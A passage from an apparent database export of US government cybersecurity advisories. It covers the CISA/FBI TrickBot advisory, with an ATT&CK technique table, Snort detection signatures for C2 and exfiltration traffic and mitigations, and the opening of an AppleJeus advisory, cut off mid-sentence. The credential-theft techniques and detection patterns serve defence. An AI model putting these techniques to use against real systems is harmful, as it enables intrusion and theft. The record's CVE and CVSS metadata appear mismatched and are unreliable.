See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot.\n\nTrickBot\u2014first identified in 2016\u2014is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.\n\nTo secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees.\n\n### Technical Details\n\nTrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which\u2014if enabled\u2014execute malware (_Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/versions/v8/techniques/T1566/001/>)], _Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002>)]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation. 
(_User Execution: Malicious Link_ [[T1204.001](<https://attack.mitre.org/versions/v8/techniques/T1204/001/>)], _User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002/>)]). In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor\u2019s command and control (C2) server to download TrickBot to the victim\u2019s system (_Command and Scripting Interpreter: JavaScript_ [[T1059.007](<https://attack.mitre.org/versions/v8/techniques/T1059/007/>)]).\n\nAttackers can use TrickBot to:\n\n * Drop other malware, such as Ryuk and Conti ransomware, or\n * Serve as an Emotet downloader (_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/versions/v8/techniques/T1105/>)]).[[1](<https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html>)]\n\nTrickBot uses person-in-the-browser attacks to steal information, such as login credentials (_Man in the Browser_ [[T1185](<https://attack.mitre.org/versions/v8/techniques/T1185/>)]). Additionally, some of TrickBot\u2019s modules spread the malware laterally across a network by abusing the Server Message Block (SMB) Protocol. 
TrickBot operators have a toolset capable of spanning the entirety of the MITRE ATT&CK framework, from actively or passively gathering information that can be used to support targeting (_Reconnaissance _[[TA0043](<https://attack.mitre.org/tactics/TA0043/>)]), to trying to manipulate, interrupt, or destroy systems and data (_Impact _[[TA0040](<https://attack.mitre.org/tactics/TA0040/>)]).\n\nTrickBot is capable of data exfiltration over a hardcoded C2 server, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041/>)], _Resource Hijacking_ [[T1496](<https://attack.mitre.org/versions/v8/techniques/T1496>)], _System Information Discovery_ [[T1082](<https://attack.mitre.org/versions/v8/techniques/T1082>)]).[[2](<https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/#background>)] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks.\n\nFigure 1 lays out TrickBot\u2019s use of enterprise techniques.\n\n_Figure 1: MITRE ATT&CK enterprise techniques used by TrickBot_\n\n### MITRE ATT&CK Techniques\n\nAccording to MITRE, _TrickBot_ [[S0266](<https://attack.mitre.org/software/S0266/>)] uses the ATT&CK techniques listed in table 1.\n\n_Table 1: TrickBot ATT&CK techniques for enterprise_\n\n_Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v8/tactics/TA0001/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nPhishing: Spearphishing Attachment | [T1566.001](<https://attack.mitre.org/versions/v8/techniques/T1566/001/>) | TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware. \nPhishing: Spearphishing Link | [T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002>) | TrickBot has been delivered via malicious links in phishing emails. 
\n \n_Execution_ [[TA0002](<https://attack.mitre.org/versions/v8/tactics/TA0002/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. \nCommand and Scripting Interpreter: Windows Command Shell | [T1059.003](<https://attack.mitre.org/versions/v8/techniques/T1059/003/>) | TrickBot has used macros in Excel documents to download and deploy the malware on the user\u2019s machine. \nCommand and Scripting Interpreter: JavaScript/JScript | [T1059.007](<https://attack.mitre.org/versions/v8/techniques/T1059/007/>) | TrickBot victims unknowingly download a malicious JavaScript file that, when opened, automatically communicates with the malicious actor\u2019s C2 server to download TrickBot to the victim\u2019s system. \nNative API | [T1106](<https://attack.mitre.org/versions/v8/techniques/T1106>) | TrickBot uses the Windows Application Programming Interface (API) call, CreateProcessW(), to manage execution flow. \nUser Execution: Malicious Link | [T1204.001](<https://attack.mitre.org/versions/v8/techniques/T1204/001/>) | TrickBot has sent spearphishing emails in an attempt to lure users to click on a malicious link. \nUser Execution: Malicious File | [T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002/>) | TrickBot has attempted to get users to launch malicious documents to deliver its payload. \n \n_Persistence_ [[TA0003](<https://attack.mitre.org/versions/v8/tactics/TA0003/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. 
\nCreate or Modify System Process: Windows Service | [T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003/>) | TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots. \n \n_Privilege Escalation _[[TA0004](<https://attack.mitre.org/versions/v8/tactics/TA0004/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nScheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005/>) | TrickBot creates a scheduled task on the system that provides persistence. \nProcess Injection: Process Hollowing | [T1055.012](<https://attack.mitre.org/versions/v8/techniques/T1055/012/>) | TrickBot injects into the svchost.exe process. \nCreate or Modify System Process: Windows Service | [T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003/>) | TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots. \n \n_Defense Evasion_ [[TA0005](<https://attack.mitre.org/versions/v8/tactics/TA0005/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nObfuscated Files or Information | [T1027](<https://attack.mitre.org/versions/v8/techniques/T1027>) | TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files. \nObfuscated Files or Information: Software Packing | [T1027.002](<https://attack.mitre.org/versions/v8/techniques/T1027/002/>) | TrickBot leverages a custom packer to obfuscate its functionality. \nMasquerading | [T1036](<https://attack.mitre.org/versions/v8/techniques/T1036>) | The TrickBot downloader has used an icon to appear as a Microsoft Word document. \nProcess Injection: Process Hollowing | [T1055.012](<https://attack.mitre.org/versions/v8/techniques/T1055/012/>) | TrickBot injects into the svchost.exe process. 
\nModify Registry | [T1112](<https://attack.mitre.org/versions/v8/techniques/T1112/>) | TrickBot can modify registry entries. \nDeobfuscate/Decode Files or Information | [T1140](<https://attack.mitre.org/versions/v8/techniques/T1140>) | TrickBot decodes the configuration data and modules. \nSubvert Trust Controls: Code Signing | [T1553.002](<https://attack.mitre.org/versions/v8/techniques/T1553/002/>) | TrickBot has come with a signed downloader component. \nImpair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/versions/v8/techniques/T1562/001/>) | TrickBot can disable Windows Defender. \n \n_Credential Access _[[TA0006](<https://attack.mitre.org/versions/v8/tactics/TA0006/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nInput Capture: Credential API Hooking | [T1056.004](<https://attack.mitre.org/versions/v8/techniques/T1056/004/>) | TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. \nUnsecured Credentials: Credentials in Files | [T1552.001](<https://attack.mitre.org/versions/v8/techniques/T1552/001/>) | TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the .vnc.lnk affix to steal VNC credentials. \nUnsecured Credentials: Credentials in Registry | [T1552.002](<https://attack.mitre.org/versions/v8/techniques/T1552/002/>) | TrickBot has retrieved PuTTY credentials by querying the Software\\SimonTatham\\Putty\\Sessions registry key. \nCredentials from Password Stores | [T1555](<https://attack.mitre.org/versions/v8/techniques/T1555>) | TrickBot can steal passwords from the KeePass open-source password manager. 
\nCredentials from Password Stores: Credentials from Web Browsers | [T1555.003](<https://attack.mitre.org/versions/v8/techniques/T1555/003/>) | TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl. \n \n_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v8/tactics/TA0007/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nSystem Service Discovery | [T1007](<https://attack.mitre.org/versions/v8/techniques/T1007/>) | TrickBot collects a list of installed programs and services on the victim\u2019s machine. \nSystem Network Configuration Discovery | [T1016](<https://attack.mitre.org/versions/v8/techniques/T1016>) | TrickBot obtains the IP address, location, and other relevant network information from the victim\u2019s machine. \nRemote System Discovery | [T1018](<https://attack.mitre.org/versions/v8/techniques/T1018>) | TrickBot can enumerate computers and network devices. \nSystem Owner/User Discovery | [T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>) | TrickBot can identify the user and groups the user belongs to on a compromised host. \nPermission Groups Discovery | [T1069](<https://attack.mitre.org/versions/v8/techniques/T1069>) | TrickBot can identify the groups the user on a compromised host belongs to. \nSystem Information Discovery | [T1082](<https://attack.mitre.org/versions/v8/techniques/T1082>) | TrickBot gathers the OS version, machine name, CPU type, and amount of RAM available from the victim\u2019s machine. \nFile and Directory Discovery | [T1083](<https://attack.mitre.org/versions/v8/techniques/T1083>) | TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information. 
\nAccount Discovery: Local Account | [T1087.001](<https://attack.mitre.org/versions/v8/techniques/T1087/001>) | TrickBot collects the users of the system. \nAccount Discovery: Email Account | [T1087.003](<https://attack.mitre.org/versions/v8/techniques/T1087/003>) | TrickBot collects email addresses from Outlook. \nDomain Trust Discovery | [T1482](<https://attack.mitre.org/versions/v8/techniques/T1482>) | TrickBot can gather information about domain trusts by utilizing Nltest. \n \n_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v8/tactics/TA0008/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nLateral Tool Transfer | [T1570](<https://attack.mitre.org/versions/v8/techniques/T1570>) | Some TrickBot modules spread the malware laterally across a network by abusing the SMB Protocol. \n \n_Collection_ [[TA0009](<https://attack.mitre.org/versions/v8/tactics/TA0009/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nData from Local System | [T1005](<https://attack.mitre.org/versions/v8/techniques/T1005>) | TrickBot collects local files and information from the victim\u2019s local machine. \nInput Capture: Credential API Hooking | [T1056.004](<https://attack.mitre.org/versions/v8/techniques/T1056/004/>) | TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. \nPerson in the Browser | [T1185](<https://attack.mitre.org/versions/v8/techniques/T1185>) | TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified webpage. 
\n \n_Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v8/tactics/TA0011/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nFallback Channels | [T1008](<https://attack.mitre.org/versions/v8/techniques/T1008>) | TrickBot can use secondary command and control (C2) servers for communication after establishing connectivity and relaying victim information to primary C2 servers. \nApplication Layer Protocol: Web Protocols | [T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>) | TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic, and various configuration files. \nIngress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v8/techniques/T1105>) | TrickBot downloads several additional files and saves them to the victim's machine. \nData Encoding: Standard Encoding | [T1132.001](<https://attack.mitre.org/versions/v8/techniques/T1132/001>) | TrickBot can Base64-encode C2 commands. \nNon-Standard Port | [T1571](<https://attack.mitre.org/versions/v8/techniques/T1571>) | Some TrickBot samples have used HTTP over ports 447 and 8082 for C2. \nEncrypted Channel: Symmetric Cryptography | [T1573.001](<https://attack.mitre.org/versions/v8/techniques/T1573/001>) | TrickBot uses a custom crypter leveraging Microsoft\u2019s CryptoAPI to encrypt C2 traffic. \n \n_Exfiltration_ [[TA0010](<https://attack.mitre.org/versions/v8/tactics/TA0010/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nExfiltration Over C2 Channel | [T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>) | TrickBot can send information about the compromised host to a hardcoded C2 server. 
\n \n_Impact_ [[TA0040](<https://attack.mitre.org/versions/v8/tactics/TA0040/>)]\n\n**Technique Title** | **ID** | **Use** \n---|---|--- \nResource Hijacking | [T1496](<https://attack.mitre.org/versions/v8/techniques/T1496>) | TrickBot actors can leverage the resources of co-opted systems for cryptomining to validate transactions of cryptocurrency networks and earn virtual currency. \n \n### Detection\n\n#### Signatures\n\nCISA developed the following Snort signatures for use in detecting network activity associated with TrickBot.\n\nalert tcp any [443,447] -> any any (msg:\"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'example.com' (Hex)\"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:\"|0b|example.com\"; fast_pattern:only; content:\"Global Security\"; content:\"IT Department\"; pcre:\"/(?:\\x09\\x00\\xc0\\xb9\\x3b\\x93\\x72\\xa3\\xf6\\xd2|\\x00\\xe2\\x08\\xff\\xfb\\x7b\\x53\\x76\\x3d)/\"; classtype:bad-unknown; metadata:service ssl,service and-ports;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"TRICKBOT_ANCHOR:HTTP URI GET contains '/anchor'\"; sid:1; rev:1; flow:established,to_server; content:\"/anchor\"; http_uri; fast_pattern:only; content:\"GET\"; nocase; http_method; pcre:\"/^\\/anchor_?.{3}\\/[\\w_-]+\\\\.[A-F0-9]+\\/?$/U\"; classtype:bad-unknown; priority:1; metadata:service http;)\n\nalert tcp any $SSL_PORTS -> any any (msg:\"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'C=XX, L=Default City, O=Default Company Ltd'\"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:\"|31 0b 30 09 06 03 55 04 06 13 02|XX\"; nocase; content:\"|31 15 30 13 06 03 55 04 07 13 0c|Default City\"; nocase; content:\"|31 1c 30 1a 06 03 55 04 0a 13 13|Default Company Ltd\"; nocase; content:!\"|31 0c 30 0a 06 03 55 04 03|\"; classtype:bad-unknown; reference:url,www.virustotal.com/gui/file/e9600404ecc42cf86d38deedef94068db39b7a0fd06b3b8fb2d8a3c7002b650e/detection; metadata:service ssl;)\n\nalert tcp any 
any -> any $HTTP_PORTS (msg:\"TRICKBOT:HTTP Client Header contains 'boundary=Arasfjasu7'\"; sid:1; rev:1; flow:established,to_server; content:\"boundary=Arasfjasu7|0d 0a|\"; http_header; content:\"name=|22|proclist|22|\"; http_header; content:!\"Referer\"; content:!\"Accept\"; content:\"POST\"; http_method; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"TRICKBOT:HTTP Client Header contains 'User-Agent|3a 20|WinHTTP loader/1.'\"; sid:1; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|WinHTTP loader/1.\"; http_header; fast_pattern:only; content:\".png|20|HTTP/1.\"; pcre:\"/^Host\\x3a\\x20(?:\\d{1,3}\\\\.){3}\\d{1,3}(?:\\x3a\\d{2,5})?$/mH\"; content:!\"Accept\"; http_header; content:!\"Referer|3a 20|\"; http_header; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any $HTTP_PORTS -> any any (msg:\"TRICKBOT:HTTP Server Header contains 'Server|3a 20|Cowboy'\"; sid:1; rev:1; flow:established,from_server; content:\"200\"; http_stat_code; content:\"Server|3a 20|Cowboy|0d 0a|\"; http_header; fast_pattern; content:\"content-length|3a 20|3|0d 0a|\"; http_header; file_data; content:\"/1/\"; depth:3; isdataat:!1,relative; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"TRICKBOT:HTTP URI POST contains C2 Exfil\"; sid:1; rev:1; flow:established,to_server; content:\"Content-Type|3a 20|multipart/form-data|3b 20|boundary=------Boundary\"; http_header; fast_pattern; content:\"User-Agent|3a 20|\"; http_header; distance:0; content:\"Content-Length|3a 20|\"; http_header; distance:0; content:\"POST\"; http_method; pcre:\"/^\\/[a-z]{3}\\d{3}\\/.+?\\\\.[A-F0-9]{32}\\/\\d{1,3}\\//U\"; pcre:\"/^Host\\x3a\\x20(?:\\d{1,3}\\\\.){3}\\d{1,3}$/mH\"; content:!\"Referer|3a|\"; http_header; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"HTTP URI GET/POST contains '/56evcxv' (Trickbot)\"; sid:1; rev:1; flow:established,to_server; 
content:\"/56evcxv\"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\n\nalert icmp any any -> any any (msg:\"TRICKBOT_ICMP_ANCHOR:ICMP traffic contains 'hanc'\"; sid:1; rev:1; itype:8; content:\"hanc\"; offset:4; fast_pattern; classtype:bad-unknown;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"HTTP Client Header contains POST with 'host|3a 20|*.onion.link' and 'data=' (Trickbot/Princess Ransomware)\"; sid:1; rev:1; flow:established,to_server; content:\"POST\"; nocase; http_method; content:\"host|3a 20|\"; http_header; content:\".onion.link\"; nocase; http_header; distance:0; within:47; fast_pattern; file_data; content:\"data=\"; distance:0; within:5; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"HTTP Client Header contains 'host|3a 20|tpsci.com' (trickbot)\"; sid:1; rev:1; flow:established,to_server; content:\"host|3a 20|tpsci.com\"; http_header; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\n\n### Mitigations\n\nCISA and FBI recommend that network defenders\u2014in federal, state, local, tribal, territorial governments, and the private sector\u2014consider applying the following best practices to strengthen the security posture of their organization's systems. 
System owners and administrators should review any configuration changes prior to implementation to avoid negative impacts.\n\n * Provide social engineering and phishing training to employees.\n * Consider drafting or updating a policy addressing suspicious emails that specifies users must report all suspicious emails to the security and/or IT departments.\n * Mark external emails with a banner denoting the email is from an external source to assist users in detecting spoofed emails.\n * Implement Group Policy Object and firewall rules.\n * Implement an antivirus program and a formalized patch management process.\n * Implement filters at the email gateway and block suspicious IP addresses at the firewall.\n * Adhere to the principle of least privilege.\n * Implement a Domain-Based Message Authentication, Reporting & Conformance (DMARC) validation system.\n * Segment and segregate networks and functions.\n * Limit unnecessary lateral communications between network hosts, segments, and devices.\n * Consider using application allowlisting technology on all assets to ensure that only authorized software executes, and all unauthorized software is blocked from executing on assets. Ensure that such technology only allows authorized, digitally signed scripts to run on a system.\n * Enforce multi-factor authentication.\n * Enable a firewall on agency workstations configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Implement an Intrusion Detection System, if not already used, to detect C2 activity and other potentially malicious network activity.\n * Monitor web traffic. 
Restrict user access to suspicious or risky sites.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Disable the use of SMBv1 across the network and require at least SMBv2 to harden systems against network propagation modules used by TrickBot.\n * Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n * See CISA\u2019s Alert on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more information on addressing potential incidents and applying best practice incident response procedures.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\n\n### Resources\n\n * CISA Fact Sheet: TrickBot Malware\n * [MS-ISAC White Paper: Security Primer \u2013 TrickBot](<https://www.cisecurity.org/white-papers/security-primer-trickbot/>)\n * [United Kingdom National Cyber Security Centre Advisory: Ryuk Ransomware Targeting Organisations Globally](<https://www.ncsc.gov.uk/news/ryuk-advisory>)\n * [CISA and MS-ISAC Joint Alert AA20-280A: Emotet Malware](<https://us-cert.cisa.gov/ncas/alerts/aa20-280a>)\n * [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>)\n\n### References\n\n[[1] FireEye Blog - A Nasty Trick: From Credential Theft Malware to Business Disruption](<https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html>)\n\n[[2] Eclypsium Blog - TrickBot Now Offers 'TrickBoot': Persist, Brick, Profit](<https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/#background>)\n\n### Revisions\n\nMarch 17, 2021: Initial 
Version|March 24, 2021: Added MITRE ATT&CK Technique T1592.003 used for reconnaissance|May 20, 2021: Added new MITRE ATT&CKs and updated Table 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2021-05-20T12:00:00", "type": "ics", "title": "TrickBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-26360"], "modified": "2021-05-20T12:00:00", "id": "AA21-076A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-076a", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-12-06T13:02:54", "description": "### Summary\n\n_This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. 
See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThis joint advisory is the result of analytic efforts among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Treasury (Treasury) to highlight the cyber threat to cryptocurrency posed by North Korea, formally known as the Democratic People\u2019s Republic of Korea (DPRK), and provide mitigation recommendations. Working with U.S. government partners, FBI, CISA, and Treasury assess that Lazarus Group\u2014which these agencies attribute to North Korean state-sponsored advanced persistent threat (APT) actors\u2014is targeting individuals and companies, including cryptocurrency exchanges and financial service companies, through the dissemination of cryptocurrency trading applications that have been modified to include malware that facilitates theft of cryptocurrency.\n\nThese cyber actors have targeted organizations for cryptocurrency theft in over 30 countries during the past year alone. It is likely that these actors view modified cryptocurrency trading applications as a means to circumvent international sanctions on North Korea\u2014the applications enable them to gain entry into companies that conduct cryptocurrency transactions and steal cryptocurrency from victim accounts. 
As highlighted in [FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks](<https://us-cert.cisa.gov/ncas/alerts/aa20-239a>) and [Guidance on the North Korean Cyber Threat](<https://us-cert.cisa.gov/ncas/alerts/aa20-106a>), North Korea\u2019s state-sponsored cyber actors are targeting cryptocurrency exchanges and accounts to steal and launder hundreds of millions of dollars in cryptocurrency.[[1](<https://us-cert.cisa.gov/ncas/alerts/aa20-239a>)][[2](<https://home.treasury.gov/news/press-releases/sm924>)][[3](<https://www.justice.gov/opa/pr/two-chinese-nationals-charged-laundering-over-100-million-cryptocurrency-exchange-hack>)] The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit [https://www.us-cert.cisa.gov/northkorea](<https://us-cert.cisa.gov/northkorea>).\n\nThe U.S. Government has identified malware and indicators of compromise (IOCs) used by the North Korean government to facilitate cryptocurrency thefts; the cybersecurity community refers to this activity as \u201cAppleJeus.\u201d This report catalogues AppleJeus malware in detail. North Korea has used AppleJeus malware posing as cryptocurrency trading platforms since at least 2018. In most instances, the malicious application\u2014seen on both Windows and Mac operating systems\u2014appears to be from a legitimate cryptocurrency trading company, thus fooling individuals into downloading it as a third-party application from a website that seems legitimate. 
In addition to infecting victims through legitimate-looking websites, HIDDEN COBRA actors also use phishing, social networking, and social engineering techniques to lure users into downloading the malware.\n\nRefer to the following Malware Analysis Reports (MARs) for full technical details of AppleJeus malware and associated IOCs.\n\n * [MAR-10322463-1.v1: AppleJeus \u2013 Celas Trade Pro](<https://us-cert.gov/ncas/analysis-reports/ar21-048a>)\n * [MAR-10322463-2.v1: AppleJeus \u2013 JMT Trading](<https://us-cert.gov/ncas/analysis-reports/ar21-048b>)\n * [MAR-10322463-3.v1: AppleJeus \u2013 Union Crypto](<https://us-cert.gov/ncas/analysis-reports/ar21-048c>)\n * [MAR-10322463-4.v1: AppleJeus \u2013 Kupay Wallet](<https://us-cert.gov/ncas/analysis-reports/ar21-048d>)\n * [MAR-10322463-5.v1: AppleJeus \u2013 CoinGoTrade](<https://us-cert.gov/ncas/analysis-reports/ar21-048e>)\n * [MAR-10322463-6.v1: AppleJeus \u2013 Dorusio](<https://us-cert.gov/ncas/analysis-reports/ar21-048f>)\n * [MAR-10322463-7.v1: AppleJeus \u2013 Ants2Whale](<https://us-cert.gov/ncas/analysis-reports/ar21-048g>)\n\n### Technical Details\n\nThe North Korean government has used multiple versions of AppleJeus since the malware was initially discovered in 2018. This section outlines seven of those versions. The MARs listed above provide further technical details of these versions. Initially, HIDDEN COBRA actors used websites that appeared to host legitimate cryptocurrency trading platforms to infect victims with AppleJeus; however, these actors are now also using other initial infection vectors, such as phishing, social networking, and social engineering techniques, to get users to download the malware.\n\n### Targeted Nations\n\nHIDDEN COBRA actors have targeted institutions with AppleJeus malware in several sectors, including energy, finance, government, industry, technology, and telecommunications. 
Since January 2020, the threat actors have targeted these sectors in the following countries: Argentina, Australia, Belgium, Brazil, Canada, China, Denmark, Estonia, Germany, Hong Kong, Hungary, India, Ireland, Israel, Italy, Japan, Luxembourg, Malta, the Netherlands, New Zealand, Poland, Russia, Saudi Arabia, Singapore, Slovenia, South Korea, Spain, Sweden, Turkey, the United Kingdom, Ukraine, and the United States (figure 1).\n\n \n \n_Figure 1: Countries targeted with AppleJeus by HIDDEN COBRA threat actors since 2020_\n\n### AppleJeus Versions Note\n\nThe version numbers used for headings in this document correspond to the order the AppleJeus campaigns were identified in open source or through other investigative means. These versions may or may not be in the correct order to develop or deploy the AppleJeus campaigns.\n\n### AppleJeus Version 1: Celas Trade Pro\n\n#### **Introduction and Infrastructure**\n\nIn August 2018, open-source reporting disclosed information about a trojanized version of a legitimate cryptocurrency trading application on an undisclosed victim\u2019s computer. The malicious program, known as Celas Trade Pro, was a modified version of the benign Q.T. Bitcoin Trader application. This incident led to the victim company being infected with a Remote Administration Tool (RAT) known as FALLCHILL, which was attributed to North Korea (HIDDEN COBRA) by the U.S. Government. FALLCHILL is a fully functional RAT with multiple commands that the adversary can issue from a command and control (C2) server to infected systems via various proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware (_Develop Capabilities: Malware _[[T1587.001](<https://attack.mitre.org/versions/v8/techniques/T1587/001/>)]). 
Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.[[4](<https://us-cert.cisa.gov/ncas/alerts/TA17-318A>)]\n\nFurther research revealed that a phishing email from a Celas LLC company (_Phishing: Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/versions/v8/techniques/T1566/002/>)]) recommended the trojanized cryptocurrency trading application to victims. The email provided a link to the Celas\u2019 website, `celasllc[.]com` (_Acquire Infrastructure: Domain _[[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]), where the victim could download a Windows or macOS version of the trojanized application.\n\nThe `celasllc[.]com` domain resolved to the following Internet Protocol (IP) addresses from May 29, 2018, to January 23, 2021.\n\nThe `celasllc[.]com` domain had a valid Sectigo (previously known as Comodo) Secure Sockets Layer (SSL) certificate (_Obtain Capabilities: Digital Certificates _[[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence.\n\n#### **Celas Trade Pro Application Analysis**\n\n#### _**Windows Program**_\n\nThe Windows version of the malicious Celas 